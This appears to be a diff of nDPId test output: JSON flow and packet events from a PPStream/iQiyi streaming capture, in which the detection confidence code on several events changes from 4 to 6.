+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01967{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"thread_ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJUEzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B66X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"} 02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUalWIrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1467353197131,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353197131,"pkt":"AQBef\/\/6dNArkea6CABFAAChc\/sAAAERIa3AqHMB7\/\/\/+scBB2wAjWbYTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1467353197240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353197240,"pkt":"AQBef\/\/6dNArkea6CABFAACXc\/0AAAERIbXAqHMB7\/\/\/+scBB2wAg2oBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhU2VydmVyOjENCk1hbjoic3NkcDpkaXNjb3ZlciINCk1YOjMNCg0K"} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1467353197271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1467353197271,"pkt":"AQBef\/\/6dNArkea6CABFAACZc\/4AAAERIbLAqHMB7\/\/\/+scBB2wAhQmdTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhUmVuZGVyZXI6MQ0KTWFuOiJzc2RwOmRpc2NvdmVyIg0KTVg6Mw0KDQo="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 